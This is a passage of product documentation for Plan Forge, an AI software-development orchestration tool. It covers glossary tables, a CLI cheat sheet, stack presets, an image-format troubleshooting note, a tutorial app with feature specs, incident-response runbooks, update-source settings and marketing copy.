| Reflexion | Re-analyzes a failed slice attempt to extract a lesson learned; the lesson is persisted to memory and injected into the next attempt's context. |
| Trajectory | Captured record of a slice attempt (prompts, tool calls, gates passed/failed, model used, duration). Stored in .forge/trajectories/. The Inner Loop replays trajectories to learn from past runs. |
| Auto-skill | Auto-promotes a successful prompt pattern into a reusable Skill after 3+ uses. Generated skill lands at .github/skills/<name>/SKILL.md for human review. |
| Gate Synthesis | Proposes new validation gates based on observed slice failures. If three runs of the same plan fail at the same regression, Gate Synthesis suggests a gate that would have caught it. |
| Postmortem | Auto-generated retrospective after a failed run, written to .forge/postmortems/. Includes timeline, root cause hypothesis, and a fix proposal. |
| Federation | Cross-project intelligence sharing via OpenBrain. One project's lesson learned becomes another project's preflight check or postmortem hint. |
| Competitive Execution | Inner-loop flavor of the Competitive Loop: two models race on the same slice; first valid result wins. Cost-bounded by escalation chain policy. |
| Auto-fix | Proposes a 1–2 slice fix plan when a gate fails. Stored in docs/plans/auto/. Distinct from LiveGuard's Fix Proposal (which fires on post-deploy drift, not slice-time gate failure). |
| Cost Anomaly | Flags slices whose token cost is >2σ above their historical baseline. Triggers escalation chain review or quorum threshold adjustment. |
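The ">2σ above baseline" rule in the Cost Anomaly entry can be sketched in a few lines. Using the population standard deviation over a plain array of past token costs is an assumption; the real subsystem may compute its baseline differently, and `isCostAnomaly` is a hypothetical name.

```javascript
// Sketch: flag a cost that exceeds mean + 2 standard deviations of history.
// Population standard deviation and the input shape are assumptions.
function isCostAnomaly(history, latest, sigmas = 2) {
  if (history.length < 2) return false; // not enough data for a baseline
  const mean = history.reduce((sum, x) => sum + x, 0) / history.length;
  const variance =
    history.reduce((sum, x) => sum + (x - mean) ** 2, 0) / history.length;
  const stdDev = Math.sqrt(variance);
  return latest > mean + sigmas * stdDev;
}

const history = [100, 110, 90, 105, 95]; // mean 100, std dev about 7.07
console.log(isCostAnomaly(history, 130)); // true
console.log(isCostAnomaly(history, 112)); // false
```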
| Term | Definition |
|---|---|
| Drift Score | Numeric score (0–100) measuring how closely code follows architecture guardrails. Lower = more violations. |
| Fix Proposal | Auto-generated 1–2 slice plan from LiveGuard findings. Stored in docs/plans/auto/. |
| LiveGuard | Post-coding operational intelligence layer. 14 MCP tools for drift, incidents, deploys, secrets, dependencies, and composite health checks. |
| MTTR | Mean Time To Resolve. Computed from incident capture to resolvedAt timestamp. |
| Secret Scan | Entropy-based scan of recent commits for potential hardcoded credentials. |
| OpenClaw | Optional external analytics service. Receives LiveGuard snapshots via POST for cross-project health monitoring. |
| Health DNA | Composite project health fingerprint: drift avg, incident rate, test pass rate, model success rate, cost per slice. Persisted to .forge/health-dna.json. Used for cross-session decay detection. |
| Forge Intelligence | Build-time self-improvement: auto-tuning escalation chains, cost calibration, adaptive quorum thresholds, slice splitting advisories. The forge gets smarter every run. |
| Recurring Incident | When 3+ incidents hit the same files in 30 days, LiveGuard auto-escalates severity and marks the pattern as systemic. |
| Deploy Journal | Append-only deploy history exposed via forge_deploy_journal. Each entry records environment, commit, slice range, gates passed, and outcome. It is the source of truth for "what shipped when" and the basis for rollback decisions. |
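As a worked illustration of the MTTR entry, this sketch averages the time between capture and resolution over resolved incidents only. `resolvedAt` appears in the glossary; `capturedAt` and `mttrMinutes` are hypothetical names chosen for the example.

```javascript
// Sketch: mean time to resolve, in minutes.
// `capturedAt` is an assumed field name; open incidents are skipped.
function mttrMinutes(incidents) {
  const durations = incidents
    .filter((incident) => incident.resolvedAt)
    .map((incident) =>
      Date.parse(incident.resolvedAt) - Date.parse(incident.capturedAt)
    );
  if (durations.length === 0) return null; // nothing resolved yet
  const totalMs = durations.reduce((sum, ms) => sum + ms, 0);
  return totalMs / durations.length / 60000;
}

const incidents = [
  { capturedAt: "2026-05-17T09:00:00Z", resolvedAt: "2026-05-17T09:30:00Z" },
  { capturedAt: "2026-05-17T10:00:00Z", resolvedAt: "2026-05-17T11:30:00Z" },
  { capturedAt: "2026-05-17T12:00:00Z" } // still open
];
console.log(mttrMinutes(incidents)); // 60
```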
| Term | Definition |
|---|---|
| PreCommit Chain | Ordered list of validation scripts declared in hooks.preCommit.chain[] that run before every slice commit. |
| Diff Classifier | The forge_diff_classify MCP tool that scans staged git diffs for security and quality issues. |
| Plan Lock Hash | SHA-256 hash stored in lockHash frontmatter; the orchestrator refuses to run if the plan body has drifted. |
| Tool Denylist | The tools.deny frontmatter field that strips listed MCP tools from the worker's session. |
| Network Allowlist | The network.allowed frontmatter field listing permitted hosts for outbound connections (currently log-only). |
| Term | Definition |
|---|---|
| Run | A single plan execution. Creates .forge/runs/<timestamp>/ with results and traces. |
| Trace | OTLP-compatible JSON recording the full execution with spans, events, and timing. |
| OTLP | OpenTelemetry Protocol, the standard format for distributed traces. Plan Forge traces are OTLP-compatible and can be exported to Jaeger, Grafana Tempo, or any collector. |
| Span | A timed unit within a trace: run (root), slice (child), gate (grandchild). |
| Cost History | .forge/cost-history.json: aggregate token/cost data across all runs. |
| Index | .forge/runs/index.jsonl: append-only run registry for instant lookup. |
| SARIF | Static Analysis Results Interchange Format, the OASIS standard JSON schema CI scanners (CodeQL, Semgrep, ESLint, etc.) emit. Plan Forge converts SARIF files into hardenable plans via sarif-to-plan.mjs, turning third-party findings into Crucible smelts. |
Printable cheat sheet. Ctrl+P for a clean print.
| Command | Description |
|---|---|
| pforge init | Bootstrap project with setup wizard |
| pforge check | Validate setup files |
| pforge smith | Diagnose environment + setup health |
| pforge status | Show phase status from roadmap |
| pforge new-phase <name> | Create new phase plan + roadmap entry |
| pforge branch <plan> | Create git branch from plan |
| pforge commit <plan> <slice> | Auto-generate conventional commit |
| pforge phase-status <plan> <status> | Update phase status in roadmap |
| pforge sweep | Scan for TODO/FIXME markers |
| pforge diff <plan> | Compare changes vs scope contract |
| pforge analyze <plan> | Consistency scoring (0–100) |
| forge_diagnose({ file }) (MCP tool) | Multi-model bug investigation |
| pforge run-plan <plan> | Execute plan (auto/assisted/estimate) |
| pforge audit-loop [--auto] | Run closed-loop drain. Off by default; opt-in via .forge.json#audit. |
| pforge timeline [--source X --window 24h] | Unified chronological view across 9 sources |
| pforge ext search\|add\|list\|remove | Extension management |
| pforge update | Update framework files |
| pforge help | Show all commands |
| pforge tour | Interactive guided walkthrough |
| Command | Description |
|---|---|
| pforge drift | Score codebase against guardrails |
| pforge incident <desc> | Capture an incident |
| pforge triage | Rank open alerts |
| pforge dep-watch | Scan dependency vulnerabilities |
| pforge secret-scan | Scan for hardcoded secrets |
| pforge health-trend | Health score over time |
| Step | Name | Session | Agent |
|---|---|---|---|
| 0 | Specify | 1 | specifier |
| 1 | Pre-flight | 1 | — |
| 2 | Harden | 1 | plan-hardener |
| 3 | Execute | 2 | executor |
| 4 | Sweep | 2 | — |
| 5 | Review | 3 | reviewer-gate |
| 6 | Ship | 4 | shipper |
| File | Purpose |
|---|---|
| .forge.json | Project config (preset, models, escalation, quorum) |
| .github/copilot-instructions.md | Master config, loads every session |
| .github/instructions/*.instructions.md | Auto-loading guardrails (15–18 files) |
| .github/agents/*.agent.md | Reviewer agents (19 total) |
| .github/prompts/step*.prompt.md | Pipeline prompt templates |
| .github/skills/*/SKILL.md | Slash command skills (13 total) |
| .github/hooks/ | Lifecycle hooks (4 files) |
| docs/plans/DEPLOYMENT-ROADMAP.md | Phase tracker |
| docs/plans/PROJECT-PRINCIPLES.md | Non-negotiable commitments |
| .forge/runs/ | Execution history, traces, logs |
| .forge/cost-history.json | Aggregate cost data |
| Port | URL | Purpose |
|---|---|---|
| 3100 | localhost:3100/dashboard | Dashboard UI + REST API |
| 3100 | localhost:3100/ui | Read-only plan browser |
| 3101 | ws://localhost:3101 | WebSocket real-time events |
| Flag | Command | Effect |
|---|---|---|
| --estimate | run-plan | Cost prediction only |
| --assisted | run-plan | Human codes, orchestrator validates |
| --resume-from N | run-plan | Skip completed slices |
| --quorum | run-plan | Multi-model consensus |
| --dry-run | most commands | Preview without executing |
| -Agent all | init/setup | Generate files for all AI tools |

Per-preset differences at a glance.
All presets share 4 universal instruction files, 8 cross-stack agents, and 6 pipeline agents. This appendix shows what's different per preset.
dotnet
| Property | Value |
|---|---|
| Build | dotnet build |
| Test | dotnet test |
| Framework | ASP.NET Core, Blazor, Dapper/EF Core |
| Testing | xUnit, NSubstitute, FluentAssertions |
| Unique files | graphql.instructions.md, dapr.instructions.md |
| Example plan | Phase-DOTNET-EXAMPLE.md |
| Detection | *.csproj or *.sln in root |
typescript
| Property | Value |
|---|---|
| Build | npm run build / tsc |
| Test | npm test / vitest |
| Framework | Express, Fastify, Next.js |
| Testing | Vitest, Jest, Supertest |
| Unique files | frontend.instructions.md (React/Vue patterns) |
| Example plan | Phase-TYPESCRIPT-EXAMPLE.md |
| Detection | tsconfig.json or package.json in root |
python
| Property | Value |
|---|---|
| Build | python -m py_compile |
| Test | pytest |
| Framework | FastAPI, Django, Flask |
| Testing | Pytest, pytest-asyncio, httpx |
| Unique files | — |
| Example plan | Phase-PYTHON-EXAMPLE.md |
| Detection | requirements.txt, pyproject.toml, or setup.py |
java
| Property | Value |
|---|---|
| Build | mvn compile / gradle build |
| Test | mvn test / gradle test |
| Framework | Spring Boot, JPA, Hibernate |
| Testing | JUnit 5, Mockito, AssertJ |
| Unique files | — |
| Example plan | Phase-JAVA-EXAMPLE.md |
| Detection | pom.xml or build.gradle |
go
| Property | Value |
|---|---|
| Build | go build ./... |
| Test | go test ./... |
| Framework | Standard library, Chi router, Cobra CLI |
| Testing | testing package, testify |
| Unique files | — |
| Example plan | Phase-GO-EXAMPLE.md |
| Detection | go.mod in root |
swift
| Property | Value |
|---|---|
| Build | swift build / xcodebuild |
| Test | swift test |
| Framework | SwiftUI, Vapor, Fluent |
| Testing | XCTest |
| Unique files | — |
| Example plan | Phase-SWIFT-EXAMPLE.md |
| Detection | Package.swift or *.xcodeproj |
rust
| Property | Value |
|---|---|
| Build | cargo build |
| Test | cargo test |
| Framework | Tokio, Axum, sqlx |
| Testing | Cargo test, proptest |
| Unique files | — |
| Example plan | Phase-RUST-EXAMPLE.md |
| Detection | Cargo.toml in root |
php
| Property | Value |
|---|---|
| Build | composer install |
| Test | php artisan test / phpunit |
| Framework | Laravel, Eloquent |
| Testing | PHPUnit, Pest |
| Unique files | — |
| Example plan | Phase-PHP-EXAMPLE.md |
| Detection | composer.json in root |
(azure-iac)
| Property | Value |
|---|---|
| Build | az bicep build / terraform validate |
| Test | az deployment group what-if / terraform plan |
| Framework | Bicep, Terraform, Azure CLI, azd |
| Testing | what-if / plan validation, Pester for PowerShell |
| Unique files | Replaces app-specific agents with: bicep-reviewer, terraform-reviewer, deploy-helper, azure-sweeper |
| Example plan | — |
| Detection | *.bicep, *.tf, or azure.yaml in root |
xAI Aurora MIME mismatch: root cause, impact, mitigations, and safe workflows.
The xAI Grok image generation API (Aurora) returns JPEG bytes regardless of the format you request. When these bytes are passed through MCP tool results with a declared media_type: "image/png", the Claude API rejects the request:
invalid_request_error: The image was specified using the image/png media type,
but the image appears to be a image/jpeg image
The generateImage() function in orchestrator.mjs has four layers of defense:
| Defense | What It Does | Code Location |
|---|---|---|
| Magic byte detection | Inspects first bytes to determine actual format (JPEG = 0xFF 0xD8 0xFF, PNG = 0x89 0x50 0x4E 0x47) | detectImageFormat() |
| Format conversion | Uses sharp to convert to requested format when actual ≠ requested | convertImageFormat() |
| Text-only MCP response | Tool returns type: "text" with JSON payload (file path, metadata), never raw base64 | server.mjs handler |
| Truncated base64 | Only first 100 chars of base64 included for diagnostics, never full bytes | generateImage() return |
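The magic-byte check in the first row of the table can be sketched as follows. This is a minimal illustration, not the actual detectImageFormat() from orchestrator.mjs: the names sniffImageFormat and needsConversion are hypothetical, and only the two signatures listed in the table are covered.

```javascript
// Hypothetical sketch of magic-byte sniffing; not the real detectImageFormat().
// Signatures are the ones listed in the defense table above.
const SIGNATURES = {
  jpeg: [0xff, 0xd8, 0xff],
  png: [0x89, 0x50, 0x4e, 0x47],
};

// Returns "jpeg", "png", or null when the leading bytes match neither signature.
function sniffImageFormat(bytes) {
  for (const [format, signature] of Object.entries(SIGNATURES)) {
    const matches = signature.every((byte, i) => bytes[i] === byte);
    if (matches) return format;
  }
  return null; // unknown or truncated input
}

// Conversion is only needed when the detected format differs from the requested one.
function needsConversion(bytes, requestedFormat) {
  const actual = sniffImageFormat(bytes);
  return actual !== null && actual !== requestedFormat;
}

// Example: a JPEG header that was requested as PNG.
const jpegHeader = Uint8Array.from([0xff, 0xd8, 0xff, 0xe0]);
console.log(sniffImageFormat(jpegHeader)); // prints: jpeg
console.log(needsConversion(jpegHeader, "png")); // prints: true
```

Trusting the bytes rather than the requested extension is what lets the caller either convert the image or correct the declared media type before anything reaches the API.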
- Specify outputPath: the image saves to disk and is not returned inline
- Use a .jpg extension: it matches what Grok actually returns (no conversion needed)
- Make sure sharp is installed: cd pforge-mcp && npm install sharp
curl -X POST http://localhost:3100/api/image/generate \
-H "Content-Type: application/json" \
-d '{
"prompt": "dark fantasy forge workshop panoramic, amber firelight",
"outputPath": "docs/manual/assets/chapter-heroes/ch1-hero.webp"
}'
node -e "
import('./pforge-mcp/orchestrator.mjs').then(m =>
m.generateImage('dark fantasy forge workshop, amber firelight', {
outputPath: 'docs/manual/assets/chapter-heroes/ch1-hero.webp',
model: 'grok-imagine-image'
}).then(r => console.log(JSON.stringify(r, null, 2)))
)
"
Tested 2026-04-07:
| Test | Result | Details |
|---|---|---|
| JPG direct (.jpg output) | ✓ PASS | Grok returns JPEG, saved as .jpg, no conversion. 41 KB. |
| PNG conversion (.png output) | ✓ PASS | Grok returns JPEG, sharp converts to PNG, 312 KB. |
| MIME detection | ✓ PASS | detectImageFormat() correctly identified JPEG bytes. |
| MCP tool response | ✓ SAFE | Returns text-only JSON, never raw base64. |
| Session recovery | ⚠ MITIGATED | Crash only occurs if raw base64 with wrong MIME enters history. Current code prevents this. |
- Check sharp: run cd pforge-mcp && npm ls sharp. If it is not installed, format conversion won't work and the extension gets corrected to .jpg instead.
- Use .jpg for all generated images. It matches Grok's native output format: no conversion, no risk, fastest save.
📄 Source: pforge-mcp/orchestrator.mjs, detectImageFormat(), convertImageFormat(), generateImage()
Pick your stack. Build a real app. Learn Plan Forge by using it.
A task tracker with users, projects, tasks, statuses, and comments. Simple enough to build in an afternoon, rich enough to exercise every Plan Forge feature. You'll run the full pipeline (Specify → Harden → Execute → Review → Ship) five times, once per phase, and learn a different manual chapter with each one.
The specs below are framework-agnostic. Plan Forge generates stack-specific plans based on your preset. Pick the one you want to learn:
mkdir tracker-app && cd tracker-app
git init
# Pick your preset (replace with dotnet, typescript, python, etc.)
.\setup.ps1 -Preset <your-stack>
# Verify
.\pforge.ps1 smith
| Phase | What You Build | Manual Chapters Practiced |
|---|---|---|
| 1 | Project scaffold + GET /health | Ch 3 (Installation), Ch 4 (Your First Plan) |
| 2 | User model + JWT auth + roles | Ch 5 (Writing Plans), Ch 9 (auto-loading auth + security instructions) |
| 3 | Project & Task CRUD + tests | Ch 6 (Dashboard monitoring), Ch 7 (CLI: sweep, diff, analyze) |
| 4 | Comments + event publishing | Ch 13 (quorum mode, parallel slices, model routing) |
| 5 | Dashboard views + caching | Ch 8 (custom instructions for reporting domain) |
This is the same exercise from Chapter 6, but now in context of a larger project. Paste this into the specifier agent:
Feature: health-endpoint
Problem: The Tracker app needs a health check endpoint so load balancers
and monitoring tools can verify the service is running.
Scenarios: GET /health every 30 seconds. Returns 200 OK with
{"status": "healthy", "version": "1.0.0"}.
Acceptance Criteria:
- GET /health returns 200 with JSON body
- Response time under 50ms
- No authentication required
- If database unreachable: 503 {"status": "degraded", "reason": "database"}
Out of Scope: Deep dependency checks, metrics endpoint, custom health UI.
Run the full pipeline: Step 0 → Step 1 → Step 2 → Step 3 → Step 4 → Step 5 → Step 6. When done, run pforge phase-status docs/plans/Phase-1-*.md complete.
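For orientation, the status-code logic in the health-endpoint acceptance criteria can be sketched as a framework-free function. This is an illustrative assumption, not the code Plan Forge generates for any preset: buildHealthResponse and its databaseReachable parameter are hypothetical names.

```javascript
// Hypothetical sketch of the health-endpoint acceptance criteria.
// A real handler would be generated per stack; this only models the response shape.
function buildHealthResponse({ databaseReachable, version = "1.0.0" }) {
  if (!databaseReachable) {
    // Spec: if the database is unreachable, return 503 with a degraded status.
    return { statusCode: 503, body: { status: "degraded", reason: "database" } };
  }
  // Spec: otherwise return 200 with status and version.
  return { statusCode: 200, body: { status: "healthy", version } };
}

const healthy = buildHealthResponse({ databaseReachable: true });
const degraded = buildHealthResponse({ databaseReachable: false });
console.log(healthy.statusCode, JSON.stringify(healthy.body));
console.log(degraded.statusCode, JSON.stringify(degraded.body));
```

Keeping the decision in a pure function makes the 200 and 503 branches easy to cover with unit tests before any routing or authentication is involved.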
Feature: user-authentication
Problem: The Tracker app needs user accounts with login, registration,
and role-based access control (admin, member).
MUST Criteria:
- User registration with email + password (hashed, never plaintext)
- Login returns JWT token (access + refresh)
- Role-based authorization: admin can manage all projects, member sees own
- Protected endpoints return 401 without valid token, 403 without required role
- Password reset flow (token-based)
SHOULD Criteria:
- Rate limiting on login endpoint (5 attempts per minute)
- Audit log for authentication events
Out of Scope: OAuth/social login, MFA, user profile editing.
auth.instructions.md and security.instructions.md load automatically. This is the applyTo mechanism from Chapter 2 in action.
Feature: project-task-management
Problem: Users need to create projects and manage tasks within them.
MUST Criteria:
- CRUD for Projects (create, read, update, delete)
- CRUD for Tasks within a project
- Task fields: title, description, status (todo/in-progress/done), priority (low/medium/high), assignee, due date
- Only project owner or admin can delete a project
- List tasks with filtering by status, assignee, priority
- Pagination on list endpoints (default 20 per page)
- 90%+ test coverage on service layer
SHOULD Criteria:
- Task sorting by priority, due date, created date
- Bulk status update for selected tasks
Out of Scope: File attachments, subtasks, task templates, Kanban board UI.
Start the MCP server (node pforge-mcp/server.mjs) and watch localhost:3100/dashboard during execution. You'll see slices progress in real time; this is Chapter 7 in action.
Feature: comments-and-events
Problem: Users need to discuss tasks via comments, and the system needs
an event bus for audit/notification purposes.
MUST Criteria:
- Add, edit, delete comments on tasks
- Only comment author or admin can edit/delete
- Event publishing: task-created, task-updated, task-status-changed, comment-added
- Event consumers: update task activity log, update project last-modified timestamp
- Comments include created_at, updated_at timestamps
SHOULD Criteria:
- @mention support in comments (notify mentioned user)
- Activity feed endpoint: recent events across user's projects
Out of Scope: Real-time WebSocket push to clients, email notifications, rich text.
Add [P] tags to the hardened plan for parallel execution. Try --quorum=auto to see multi-model consensus on complex slices. See Chapter 14.
Feature: dashboard-and-reporting
Problem: Users need an overview of their projects with status summaries,
task distribution, and activity trends.
MUST Criteria:
- Dashboard endpoint: project count, task count by status, overdue tasks
- Per-project summary: task breakdown, recent activity, completion percentage
- Reporting endpoint: tasks completed this week/month, average time to close
- Cache dashboard data (invalidate on task/project changes)
SHOULD Criteria:
- Configurable date ranges on reports
- Export report as JSON
Out of Scope: Charts/graphs (API only), PDF export, scheduled reports.
Create .github/instructions/reporting.instructions.md with rules for your reporting domain (cache invalidation patterns, aggregation query patterns). This is Chapter 9 in action.
Finished all 5 phases? Try these advanced exercises:
| Exercise | What You'll Learn | Command/Chapter |
|---|---|---|
| Add multi-tenancy | Install an extension, see guardrails auto-apply | pforge ext add saas-multi-tenancy → Ch 11 |
| Add CI validation | Automate quality gates on PRs | Copy plan-forge-validate.yml → Ch 13 |
| Quorum analysis | Multi-model consistency scoring | pforge analyze --quorum docs/plans/Phase-3-*.md |
| Generate a Project Profile | Tighten guardrails based on your standards | Attach project-profile.prompt.md → Ch 8 |
| Define Project Principles | Declare non-negotiable commitments | Attach project-principles.prompt.md → Ch 8 |
| Run with a different AI tool | Test multi-agent setup | .\setup.ps1 -Agent claude → Ch 12 |
| Diagnose a bug | Multi-model bug investigation | pforge diagnose src/services/TaskService.* → Ch 7 |
📄 Based on the Tracker sample app in plan-forge-testbed. See also: greenfield-todo-api walkthrough on GitHub
The guardian fired. Here's exactly what to do next.
Every LiveGuard alert carries one of four severity levels. The matrix below defines response SLA and escalation path. Full runbooks per alert type follow.
| Severity | Response SLA | Notify | Dashboard Badge |
|---|---|---|---|
| Critical | Immediate, within 1 hour | On-call + team lead | Red badge on Triage tab |
| High | Same business day | On-call engineer | Amber badge on Triage tab |
| Medium | Next sprint | Team chat | Yellow dot on relevant tab |
| Low | Backlog | — | No badge |
Source: forge_drift_report | Typical severity: Medium–High
- Run pforge drift to get the current score and delta. If delta > 10 points in one session, treat as High.
- Review violations[] in the output; each violation lists the file, rule, and instruction file it violates.
- Re-run pforge drift; the score should recover to within 5 points of the previous baseline.
Source: forge_secret_scan | Typical severity: Critical
- git reset HEAD~1, remove the credential, re-commit.
- Use git filter-repo or BFG Repo-Cleaner to purge the secret from git history. A simple amendment is not sufficient because the old commit object still exists.
- Store the secret in .forge/secrets.json (gitignored), an environment variable, or your cloud vault. Never in source code.
- Re-run pforge secret-scan; output should show clean: true.
Source: forge_env_diff | Typical severity: Medium–High
- Run pforge env-diff to see which keys are missing and in which files.
- Some keys (for example, DEBUG=true) are intentionally absent from production.
- Add each missing key to the relevant .env.* file with the appropriate value for that environment.
- Mark intentional gaps with a comment in the .env file: # NOT_IN_PROD: DEBUG.
- Re-run pforge env-diff; output should show clean: true or only expected gaps.
Source: forge_regression_guard | Typical severity: High
- Run pforge regression-guard to see which gates failed and their error output.
- Use git log to find which commit broke the gate. The gate command output usually points at the exact file.
- Re-run pforge regression-guard --plan <affected-plan>; all gates should pass.
Source: forge_dep_watch | Typical severity: Medium–Critical (depends on CVE severity)
- Run pforge dep-watch to see new vulnerabilities with their CVE IDs and severity.
- Run npm update <package> or pin to a patched version. For transitive dependencies, use npm audit fix.
- Re-run pforge dep-watch; the vulnerability should move from newVulnerabilities to resolvedVulnerabilities.
Source: forge_alert_triage (via MTTR calculation) | Typical severity: High
- Run pforge triage to see ranked open incidents and drift violations with their MTTR.
- Escalate using onCall.escalation.
When a LiveGuard tool fires a failure (regression, drift, incident, or secret found), forge_fix_proposal generates a scoped 1-2 slice fix plan for human review. This is the detect → propose → approve → fix loop.
- Run pforge fix-proposal --source regression (or drift/incident/secret) after the alert fires.
- Review the generated plan at docs/plans/auto/LIVEGUARD-FIX-<incidentId>.md. The plan contains the failing command, affected files, and a template fix slice with <!-- TODO --> markers for you to fill in.
- Run pforge run-plan --assisted docs/plans/auto/LIVEGUARD-FIX-<incidentId>.md. The plan targets a dedicated branch, never master.
- Proposals are tracked in .forge/fix-proposals.json. Auto-generated plans in docs/plans/auto/ are gitignored; promote a plan manually to docs/plans/ if you want to keep it in version history.
forge_fix_proposal generates at most one proposal per incidentId. If the first proposal doesn’t resolve the issue, address it manually; the tool will return status: "needs-human-intervention" on the second call.
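The one-proposal-per-incident rule can be modelled with a small in-memory guard. This is a sketch under stated assumptions, not the forge_fix_proposal implementation: requestFixProposal, the Map store, and the "proposed" status value are hypothetical; only the "needs-human-intervention" status and the plan path pattern come from the text above.

```javascript
// Hypothetical in-memory model of the one-proposal-per-incidentId rule.
// The real tool persists its state; a Map stands in for that here.
const proposals = new Map();

function requestFixProposal(incidentId) {
  if (proposals.has(incidentId)) {
    // A second request for the same incident is handed back to a human.
    return { incidentId, status: "needs-human-intervention" };
  }
  const planPath = `docs/plans/auto/LIVEGUARD-FIX-${incidentId}.md`;
  proposals.set(incidentId, planPath);
  // "proposed" is an assumed label for the first, successful call.
  return { incidentId, status: "proposed", planPath };
}

const first = requestFixProposal("inc-001");
const second = requestFixProposal("inc-001");
console.log(first.status, first.planPath);
console.log(second.status);
```

Capping the loop at one automated attempt keeps a failing fix from being regenerated indefinitely without review.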
Where pforge update pulls template bytes from, and why the default changed in v2.56.0.
Before v2.56.0, pforge update had a single hard-coded source-selection rule: use the sibling clone at ../plan-forge if one existed, otherwise fail and ask for --from-github. This was optimized for contributors on their primary machine: the sibling is always on master, which is always freshly built, so contributors dogfood every change.
The trouble showed up on secondary machines: users who happened to have cloned the Plan Forge repo earlier (say, to browse the source) would later run pforge update on an unrelated project and get surprise -dev bytes from a stale master checkout. The second PC behaved differently from the first, for reasons that weren't obvious.
.forge.json now accepts an updateSource key with three values. The default, auto, picks the right thing for most people; the other two give you explicit control.
| Mode | Behavior | When to use |
|---|---|---|
| auto (default) | Picks the newer of your sibling clone and the latest GitHub tag. If the sibling is on a -dev build, GitHub wins. | Users on any machine. Teams. Anyone who isn't actively contributing patches back to Plan Forge. |
| github-tags | Always downloads the latest tagged release from GitHub. Ignores any sibling clone even if present. | Teams that want reproducible, audited updates. CI pipelines. Pinned-dependency shops. |
| local-sibling | Always uses the sibling clone at ../plan-forge. Errors if one is missing. | Contributors working on Plan Forge itself. You run git pull in the sibling to pick up changes. |
auto mode uses a GitHub lookup (.forge/update-check.json) to resolve the latest tag, reads the sibling's VERSION file, and compares the two with semver precedence: any -dev pre-release loses to a clean tag. If the sibling wins or there's no network, it uses the sibling. If GitHub wins or there's no sibling, it uses the tag.
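The selection rule described above can be sketched as a small pure function. This is an illustration under assumptions, not the pforge source: parseVersion, compareCore, and pickUpdateSource are hypothetical names, versions are assumed to look like 2.56.0 or 2.57.0-dev, and the tie-break (equal versions use the tag) is an assumption the text does not specify.

```javascript
// Hypothetical sketch of auto-mode source selection; not the actual pforge code.
function parseVersion(version) {
  const [core, preRelease] = version.trim().replace(/^v/, "").split("-", 2);
  const [major, minor, patch] = core.split(".").map(Number);
  return { major, minor, patch, isDev: preRelease !== undefined };
}

// Positive when a is newer than b, negative when older, 0 when equal.
function compareCore(a, b) {
  for (const key of ["major", "minor", "patch"]) {
    if (a[key] !== b[key]) return a[key] - b[key];
  }
  return 0;
}

// siblingVersion: contents of the sibling's VERSION file, or null if there is no sibling.
// latestTag: latest GitHub tag, or null if the lookup failed (for example, no network).
function pickUpdateSource(siblingVersion, latestTag) {
  if (siblingVersion === null && latestTag === null) return "none";
  if (latestTag === null) return "sibling";
  if (siblingVersion === null) return "github-tag";
  const sibling = parseVersion(siblingVersion);
  if (sibling.isDev) return "github-tag"; // a -dev build always loses to a clean tag
  // Assumption: on a tie, the tagged release is used.
  return compareCore(sibling, parseVersion(latestTag)) > 0 ? "sibling" : "github-tag";
}

console.log(pickUpdateSource("2.57.0-dev", "2.56.0")); // prints: github-tag
console.log(pickUpdateSource("2.57.0", "2.56.0")); // prints: sibling
console.log(pickUpdateSource("2.55.0", null)); // prints: sibling
```

Note that the -dev check runs before the numeric comparison, which matches the table's statement that GitHub wins whenever the sibling is on a -dev build.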
Three ways, all equivalent: each one writes .forge.json.
# Read current value
pforge config get update-source
# Set it
pforge config set update-source github-tags
pforge config set update-source local-sibling
pforge config set update-source auto
# List all settable keys
pforge config list
Open the dashboard (localhost:3100/dashboard), switch to the Config tab, find the Update Source select. Your choice saves immediately, no Save button required. The hint text below the dropdown reminds you what each mode does.
.forge.json
{
"preset": "dotnet",
"templateVersion": "2.56.0",
"updateSource": "auto"
}
Will auto ever install -dev bytes over my clean release?
No. The -dev refusal guard from v2.53.2 is still in place: if the selected source is a -dev build and your current install is clean, the update aborts with a helpful message. auto mode short-circuits this earlier by preferring the tagged release. If you explicitly set local-sibling and the sibling is -dev, you'll hit the refusal unless you pass --allow-dev.
What if GitHub is unreachable in auto mode?
If the GitHub tag lookup fails (timeout, no network, rate-limit), auto falls back to the sibling if one exists. If there's no sibling and no network, you'll get the same error you would have gotten pre-v2.56.0: run with --from-github when you're back online, or set up a sibling clone.
pforge self-update — does this affect it?
No. self-update is a separate command that always pulls from GitHub releases (it's designed to heal a corrupted install). updateSource only controls pforge update.
Yes, set updateSource to github-tags in your CI's .forge.json. This guarantees every CI run pulls from a specific tagged release and ignores whatever happens to be checked out in adjacent directories.
Do I need to change my existing .forge.json?
No. Projects with no updateSource key default to auto, which is the recommended behavior anyway. The change is additive.
pforge update and pforge config flag list.
The thesis: GitHub ships the agent runtime + integration standards + customization primitives + engagement metrics. Everything above the runtime is the ecosystem's lane. Plan Forge is built for that lane.
Who this page is for: Engineering leaders, platform engineers, and architects evaluating a complete AI-SDLC stack, whether you've already standardized on GitHub Copilot or you're shopping the category fresh.
Companion to: What is Plan Forge? · How it works · Appendix I — Plan Forge on the GitHub Stack (the surface-by-surface technical reference).
Plan Forge + GitHub Copilot ships four capabilities no other AI-SDLC platform on the market combines today:
Six numbers every AI-SDLC programme is shopping for. Plan Forge surfaces all six on the live dashboard out of the box, no warehouse project, no BI build, no glue code.
The leading-indicator metric leadership usually asks for last, human-intervention frequency, is also captured automatically. Every time a human took over from an agent is recorded; trend lines show whether the harness is getting better or worse. See Health DNA for the full metric catalogue, or the quick reference for the complete dashboard surface.
Read top-down: outcomes you get, the harness (the orchestration layer Plan Forge provides), the substrate (GitHub Copilot's primitives) it sits on, and the GitHub platform foundation everything inherits.
The first complete AI software-development lifecycle stack: GitHub Copilot below, Plan Forge above, your outcomes on top.
Plan Forge organises into four pillars. Each card is plain English; click What's inside for the component-level detail and the manual chapter that goes deep.
Plans become slices, slices become work, work becomes audited PRs.
An idea is interviewed into a hardened plan. The plan is split into safe-sized slices. Each slice runs in its own worktree, gets reviewed by 20 specialised reviewer agents, and only ships if its validation gate passes. The platform learns from every run and builds new skills automatically.
Crucible interview funnel · Tempering quality scorer · Inner Loop competitive worktrees · Forge-Master chat-first router · 20 read-only reviewer agents · 14 slash-command skills · Reflexion retry · auto-skill library · lifecycle hooks (pre/post slice).
→ Crucible · Inner Loop · Forge-Master · Instructions & Agents · Agent Factory recipe · Multi-agent
… and more. Full surface area in the quick reference.
Context quality compounds across teams instead of being a per-repo lottery.
Three tiers: a live event stream you can watch right now, a deterministic file trail every team can audit and grep, and an optional semantic store that lets one team's lessons surface automatically when another team hits a similar problem. Lessons learned in service A become defaults in service B without anyone filing a knowledge-base article.
